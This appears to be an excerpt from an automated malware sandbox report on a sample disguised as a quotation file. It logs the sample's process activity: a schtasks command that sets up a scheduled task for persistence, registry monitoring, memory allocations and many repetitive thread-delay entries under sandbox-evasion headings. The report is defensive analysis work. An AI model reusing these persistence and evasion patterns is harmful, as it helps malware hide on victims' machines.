Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 2820, type: MEMORYSTR
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: EF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 2A50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 1010000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 7840000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 8840000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 89F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 99F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 1250000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 2DB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: 4DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 2540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 4540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 7000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 8000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 81A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 91A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory allocated: 5090000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599873
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599763
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599422
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599312
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599203
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 599094
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598969
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598859
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598750
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598640
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598531
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598422
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598312
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598203
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 598094
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597984
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597875
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597765
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597653
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597547
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597437
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597218
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597109
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 597000
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596890
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596781
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596671
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596562
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596344
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596234
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595796
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594922
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594703
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599558
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598451
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598316
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596030
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595774
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595504
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594936
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7075
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1061
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Window / User API: threadDelayed 2508
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Window / User API: threadDelayed 7333
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Window / User API: threadDelayed 2530
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Window / User API: threadDelayed 7328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 4836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4148 Thread sleep count: 5592 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 800 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060 Thread sleep count: 2508 > 30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599873s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599763s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060 Thread sleep count: 7333 > 30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598859s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597984s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597875s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597765s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597653s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596671s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800 Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 6696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088 Thread sleep count: 2530 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088 Thread sleep count: 7328 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599558s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598575s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598451s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598316s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -598077s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597312s >= -30000s
